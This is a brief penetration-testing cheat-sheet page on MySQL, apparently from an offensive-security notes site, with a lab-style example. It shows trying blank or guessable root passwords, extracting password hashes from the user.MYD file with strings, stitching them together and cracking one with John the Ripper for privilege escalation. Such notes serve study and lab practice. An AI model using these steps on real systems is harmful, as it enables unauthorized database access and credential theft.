MySql

Easy to Try

  • Sometimes people leave NO password or easy to guess.

su mysql        .. sometimes an actual user
mysql -u root   .. see if you can get into mysql easily
                .. easy guess 'mysql' password!!

Navigate

show databases;
use [DATABASE];
show tables;
select * from [TABLE];

Strings MYD

> strings /var/lib/mysql/mysql/user.MYD   ..might get you a password 

localhost
root*D3240DFEFEDF838952C03D28
6c732c6044b7
root 127.0.0.1
root localhost
debian-sys-maint*D1461CE757B9B67AC344204A3A7FE9F9DB17A35C
68B0F4D12A2A1885

..
Stitch the two together:
root:*D3240DFEFEDF838952C03D2868B0F4D12A2A1885

john ./lab.txt
root18  ..cracked!

PrivEsc

PreviousMetasploitNextNFS

Last updated

Was this helpful?